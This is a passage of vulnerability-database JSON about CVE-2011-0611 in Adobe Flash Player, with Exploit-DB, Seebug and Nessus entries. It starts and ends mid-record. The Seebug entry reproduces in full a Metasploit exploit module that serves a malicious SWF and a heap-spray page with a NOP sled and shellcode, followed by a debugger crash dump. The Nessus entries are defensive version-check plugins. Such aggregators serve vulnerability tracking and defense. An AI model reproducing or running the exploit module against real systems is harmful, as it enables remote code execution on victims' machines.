#{cli.peerhost}:#{cli.peerport}\")\r\n\t\tsend_response(cli, html, {'Content-Type' => \"text/html\"} )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2011-0611.swf\")\r\n\t\tf = File.open(path, \"rb\")\r\n\t\t@trigger = f.read(f.stat.size)\r\n\t\tf.close\r\n\r\n\t\tsuper\r\n\tend\r\nend\r\n\r\n\r\n=begin\r\n0:000> r\r\neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0\r\neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\r\nFlash10o+0xd01f6:\r\n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????\r\n0:000> dd ecx\r\n01d650b0 11111110 00000000 00000000 00000000\r\n01d650c0 00000000 00000000 00000000 00000000\r\n01d650d0 00000000 00000000 00000000 00000000\r\n01d650e0 00000000 00000000 00000000 00000000\r\n01d650f0 00000000 00000000 00000000 00000000\r\n01d65100 00000000 00000000 00000000 00000000\r\n01d65110 00000000 00000000 00000000 00000000\r\n01d65120 00000000 00000000 00000000 00000000\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17175/"}], "seebug": [{"lastseen": "2017-11-19T18:05:25", "description": "Bugtraq ID: 47314\r\nCVE ID\uff1aCVE-2011-0611\r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002\r\nWindows, Macintosh, Linux\u548cSolaris\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u7684Adobe Flash Player 10.2.153.1\u548c\u4e4b\u524d\u7248\u672c(Adobe Flash Player 10.2.154.25\u548c\u7528\u4e8eChrome\u7528\u6237\u7684\u65e9\u671f\u7248\u672c)\uff0cAndroid\u4e0b\u7684Adobe Flash Player 10.2.156.12\u53ca\u65e9\u671f\u7248\u672c\uff0cWindows\u548cMacintosh\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u7684Adobe Reader\u53caAcrobat X (10.0.2)\u548cReader\u53caAcrobat\u65e9\u671f10.x\u548c9.x\u7248\u672c\u63d0\u4f9b\u7684Authplay.dll\u7ec4\u4ef6\u5b58\u5728\u4e25\u91cd\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\u6b64\u6f0f\u6d1e(CVE-2011-0611)\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\uff0c\u6216\u5141\u8bb8\u653b\u51fb\u8005\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\uff0c\u6839\u636e\u62a5\u544a\u6b64\u6f0f\u6d1e\u5728\u7f51\u7edc\u4e0a\u5df2\u79ef\u6781\u5229\u7528\uff0c\u628a\u6076\u610fFLASH(.swf)\u6587\u4ef6\u5d4c\u5165\u5230Microsoft Word(.doc)\uff0c\u5e76\u901a\u8fc7Email\u9644\u4ef6\u8f7d\u4f53\u8fdb\u884c\u653b\u51fb\u8005\u3002\u76ee\u524d\u8fd8\u6ca1\u6709\u6ce8\u610f\u5230\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7PDF\u9488\u5bf9Adobe Reader\u548cAcrobat\u8fdb\u884c\u653b\u51fb\u3002 Adobe Reader X\u4e5f\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff0c\u4f46\u80fd\u6210\u529f\u9632\u6b62\u6076\u610f\u4ee3\u7801\u6267\u884c\u3002 \r\n\r\nAdobe Reader 9.3.4\r\nAdobe Reader 9.3.4\r\nAdobe Reader 9.3.3\r\nAdobe Reader 9.3.2\r\nAdobe Reader 9.3.1\r\nAdobe Reader 9.1.3\r\nAdobe Reader 9.1.2\r\nAdobe Reader 9.1.1\r\nAdobe Reader 9.4.2\r\nAdobe Reader 9.4.1\r\nAdobe Reader 9.4\r\nAdobe Reader 9.3\r\nAdobe Reader 9.2\r\nAdobe Reader 9.1\r\nAdobe Reader 9\r\nAdobe Reader 9\r\nAdobe Reader 10.0.1\r\nAdobe Reader 10.0\r\nAdobe Flash Player 10.1.53 .64\r\nAdobe Flash Player 10.1.51 .66\r\nAdobe Flash Player 10.0.45 2\r\nAdobe Flash Player 10.0.45 2\r\nAdobe Flash Player 10.0.45 2\r\nAdobe Flash Player 10.0.32 18\r\nAdobe Flash Player 10.0.22 .87\r\nAdobe Flash Player 10.0.15 .3\r\nAdobe Flash Player 10.0.12 .36\r\nAdobe Flash Player 10.0.12 .35\r\nAdobe Flash Player 10.2.156.12\r\nAdobe Flash Player 10.2.154.25\r\nAdobe Flash Player 10.2.154.18\r\nAdobe Flash Player 10.2.154.13\r\nAdobe Flash Player 10.2.153.1\r\nAdobe Flash Player 10.2.152.33\r\nAdobe Flash Player 10.2.152.21\r\nAdobe Flash Player 10.1.95.2\r\nAdobe Flash Player 10.1.95.1\r\nAdobe Flash Player 10.1.92.10\r\nAdobe Flash Player 10.1.92.10\r\nAdobe Flash Player 10.1.85.3\r\nAdobe Flash Player 10.1.82.76\r\nAdobe Flash Player 10.1.106.16\r\nAdobe Flash Player 10.1.105.6\r\nAdobe Flash Player 10.1.102.65\r\nAdobe Flash Player 10.1.102.64\r\nAdobe Flash Player 10.1 Release Candida\r\nAdobe Flash Player 10.0.42.34\r\nAdobe Flash Player 10.0.32.18\r\nAdobe Flash Player 10\r\nAdobe Acrobat Standard 9.3.4\r\nAdobe Acrobat Standard 9.3.4\r\nAdobe Acrobat Standard 9.3.3\r\nAdobe Acrobat Standard 9.3.2\r\nAdobe Acrobat Standard 9.3.1\r\nAdobe Acrobat Standard 9.1.3\r\nAdobe Acrobat Standard 9.1.2\r\nAdobe Acrobat Standard 9.4.2\r\nAdobe Acrobat Standard 9.4.1\r\nAdobe Acrobat Standard 9.4\r\nAdobe Acrobat Standard 9.3\r\nAdobe Acrobat Standard 9.2\r\nAdobe Acrobat Standard 9.1\r\nAdobe Acrobat Standard 9\r\nAdobe Acrobat Standard 10.0.2\r\nAdobe Acrobat Standard 10.0.1\r\nAdobe Acrobat Standard 10.0\r\nAdobe Acrobat Professional 9.3.4\r\nAdobe Acrobat Professional 9.3.3\r\nAdobe Acrobat Professional 9.3.2\r\nAdobe Acrobat Professional 9.3.1\r\nAdobe Acrobat Professional 9.1.3\r\nAdobe Acrobat Professional 9.1.2\r\nAdobe Acrobat Professional 9.4.2\r\nAdobe Acrobat Professional 9.4.1\r\nAdobe Acrobat Professional 9.4\r\nAdobe Acrobat Professional 9.3\r\nAdobe Acrobat Professional 9.2\r\nAdobe Acrobat Professional 9.1\r\nAdobe Acrobat Professional 9 Extended\r\nAdobe Acrobat Professional 9\r\nAdobe Acrobat Professional 10.0.2\r\nAdobe Acrobat Professional 10.0.1\r\nAdobe Acrobat Professional 10.0\r\nAdobe Acrobat 9.3.3\r\nAdobe Acrobat 9.3.3\r\nAdobe Acrobat 9.3.2\r\nAdobe Acrobat 9.3.1\r\nAdobe Acrobat 9.1.1\r\nAdobe Acrobat 8.2.4\r\nAdobe Acrobat 9.4.2\r\nAdobe Acrobat 9.4.1\r\nAdobe Acrobat 9.4\r\nAdobe Acrobat 9.3\r\nAdobe Acrobat 9.2\r\nAdobe Acrobat 9\r\nAdobe Acrobat 10.0.2\r\nAdobe Acrobat 10.0.1\r\nAdobe Acrobat 10.0\r\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.adobe.com/", "published": "2011-04-13T00:00:00", "title": "Adobe Flash Player 'SWF'\u6587\u4ef6\u8fdc\u7a0b\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20472", "id": "SSV:20472", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:04:47", "description": "No description provided by source.", "published": "2011-04-24T00:00:00", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20497", "id": "SSV:20497", "sourceData": "\n ##\r\n# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Adobe Flash Player that was discovered, and\r\n has been exploited actively in the wild. By embedding a specially crafted .swf file,\r\n Adobe Flash crashes due to an invalid use of an object type, which allows attackers to\r\n overwrite a pointer in memory, and results arbitrary code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Version' => "$Revision: 12330 $",\r\n 'Author' =>\r\n [\r\n 'sinn3r',\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-0611' ],\r\n [ 'OSVDB', '71686' ],\r\n [ 'BID', '47314' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],\r\n [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],\r\n [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],\r\n [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],\r\n [ 'URL', 'http://secunia.com/blog/210' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\x00",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => "process",\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Apr 11 2011",\r\n 'DefaultTarget' => 0))\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n agent = request.headers['User-Agent']\r\n if agent !~ /MSIE \\d\\.\\d/ and agent !~ /NT \\d\\.\\d/\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n if request.uri =~ /\\.swf/\r\n print_status("Sending trigger SWF...")\r\n send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )\r\n return\r\n end\r\n \r\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n nopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch))\r\n \r\n swf_name = rand_text_alpha(rand(3))\r\n js_func_name = rand_text_alpha(rand(6) +3)\r\n js_var_blocks_name = rand_text_alpha(rand(6) + 3)\r\n js_var_shell_name = rand_text_alpha(rand(6) + 3)\r\n js_var_nopsled_name = rand_text_alpha(rand(6) + 3)\r\n js_var_index_name = rand_text_alpha(rand(6) + 3)\r\n js_var_padding_offset = rand_text_alpha(rand(6) + 3)\r\n trigger_file_name = "#{get_resource}/#{swf_name}.swf"\r\n \r\n html = <<-EOS\r\n <html>\r\n <head>\r\n <script>\r\n function #{js_func_name}() {\r\n var #{js_var_blocks_name} = new Array();\r\n var #{js_var_shell_name} = unescape("#{shellcode}");\r\n var #{js_var_nopsled_name} = unescape("#{nopsled}");\r\n var #{js_var_padding_offset} = #{js_var_shell_name}.length;\r\n while (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape("#{nopsled}") };\r\n #{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length);\r\n #{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name};\r\n for (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) {\r\n #{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length);\r\n }\r\n }\r\n #{js_func_name}();\r\n </script>\r\n </head>\r\n <body>\r\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"\r\n codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n <param name="movie" value="#{trigger_file_name}" />\r\n <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"\r\n pluginspage="http://www.macromedia.com/go/getflashplayer">\r\n </embed>\r\n </body>\r\n </html>\r\n EOS\r\n \r\n html = html.gsub(/^\\t\\t/, "")\r\n \r\n print_status("Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}")\r\n send_response(cli, html, {'Content-Type' => "text/html"} )\r\n end\r\n \r\n def exploit\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0611.swf")\r\n f = File.open(path, "rb")\r\n @trigger = f.read(f.stat.size)\r\n f.close\r\n \r\n super\r\n end\r\nend\r\n \r\n \r\n=begin\r\n0:000> r\r\neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0\r\neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\r\nFlash10o+0xd01f6:\r\n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????\r\n0:000> dd ecx\r\n01d650b0 11111110 00000000 00000000 00000000\r\n01d650c0 00000000 00000000 00000000 00000000\r\n01d650d0 00000000 00000000 00000000 00000000\r\n01d650e0 00000000 00000000 00000000 00000000\r\n01d650f0 00000000 00000000 00000000 00000000\r\n01d65100 00000000 00000000 00000000 00000000\r\n01d65110 00000000 00000000 00000000 00000000\r\n01d65120 00000000 00000000 00000000 00000000\r\n=end\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20497"}, {"lastseen": "2017-11-19T15:58:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Reader X Atom Type Confusion Vulnerability Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71835", "id": "SSV:71835", "sourceData": "\n # Exploit Title: Adobe Reader X Atom Type Confusion Vulnerability Exploit\r\n# Date: 7/3/2011\r\n# Author: Snake ( Shahriyar.j < at > gmail )\r\n# Version: Adobe Reader X < 10.1\r\n# Tested on: 10.0.0 - 10.0.1 - Windows 7 - IE/FF/Opera\r\n# CVE : CVE-2011-0611\r\n#\r\n#This is the exploit I wrote for Abysssec "The Arashi" article.\r\n#It gracefully bypass DEP/ASLR ( not the sandbox ) in Adobe Reader X,\r\n#and we named this method "Tatsumaki DEP/ASRL Bypass" : >\r\n#It work reliably on IE9/FF4 and other browsers.\r\n#\r\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\r\n http://www.exploit-db.com/download_pdf/17469\r\n# me : twitter.com/ponez\r\n# also check here for The Persian docs of this methods and more :\r\nhttp://www.0days.ir/article/\r\n\r\nExploit-DB mirror: http://www.exploit-db.com/sploits/cve-2011-0611_exploit.pdf\r\n\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71835"}], "nessus": [{"lastseen": "2021-01-07T10:41:07", "description": "Adobe Product Security Incident Response Team reports :\n\nA critical vulnerability exists in Flash Player 10.2.153.1 and earlier\nversions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users)\nfor Windows, Macintosh, Linux and Solaris, Adobe Flash Player\n10.2.156.12 and earlier versions for Android, and the Authplay.dll\ncomponent that ships with Adobe Reader and Acrobat X (10.0.2) and\nearlier 10.x and 9.x versions for Windows and Macintosh operating\nsystems.\n\nThis vulnerability (CVE-2011-0611) could cause a crash and potentially\nallow an attacker to take control of the affected system. There are\nreports that this vulnerability is being exploited in the wild in\ntargeted attacks via a malicious Web page or a Flash (.swf) file\nembedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file\ndelivered as an email attachment, targeting the Windows platform. At\nthis time, Adobe is not aware of any attacks via PDF targeting Adobe\nReader and Acrobat. Adobe Reader X Protected Mode mitigations would\nprevent an exploit of this kind from executing.", "edition": 25, "published": "2011-04-18T00:00:00", "title": "FreeBSD : linux-flashplugin -- remote code execution vulnerability (32b05547-6913-11e0-bdc4-001b2134ef46)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplugin", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin"], "id": "FREEBSD_PKG_32B05547691311E0BDC4001B2134EF46.NASL", "href": "https://www.tenable.com/plugins/nessus/53468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53468);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"FreeBSD : linux-flashplugin -- remote code execution vulnerability (32b05547-6913-11e0-bdc4-001b2134ef46)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Product Security Incident Response Team reports :\n\nA critical vulnerability exists in Flash Player 10.2.153.1 and earlier\nversions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users)\nfor Windows, Macintosh, Linux and Solaris, Adobe Flash Player\n10.2.156.12 and earlier versions for Android, and the Authplay.dll\ncomponent that ships with Adobe Reader and Acrobat X (10.0.2) and\nearlier 10.x and 9.x versions for Windows and Macintosh operating\nsystems.\n\nThis vulnerability (CVE-2011-0611) could cause a crash and potentially\nallow an attacker to take control of the affected system. There are\nreports that this vulnerability is being exploited in the wild in\ntargeted attacks via a malicious Web page or a Flash (.swf) file\nembedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file\ndelivered as an email attachment, targeting the Windows platform. At\nthis time, Adobe is not aware of any attacks via PDF targeting Adobe\nReader and Acrobat. Adobe Reader X Protected Mode mitigations would\nprevent an exploit of this kind from executing.\"\n );\n # http://www.adobe.com/support/security/advisories/apsa11-02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/advisories/apsa11-02.html\"\n );\n # https://vuxml.freebsd.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe00646c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplugin<=9.0r289\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<10.2r159.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:12", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_3_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/75497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75497);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)\");\n script_summary(english:\"Check for the flash-player-4399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-04/msg00066.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"flash-player-10.2.159.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:42", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_2_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/53722", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 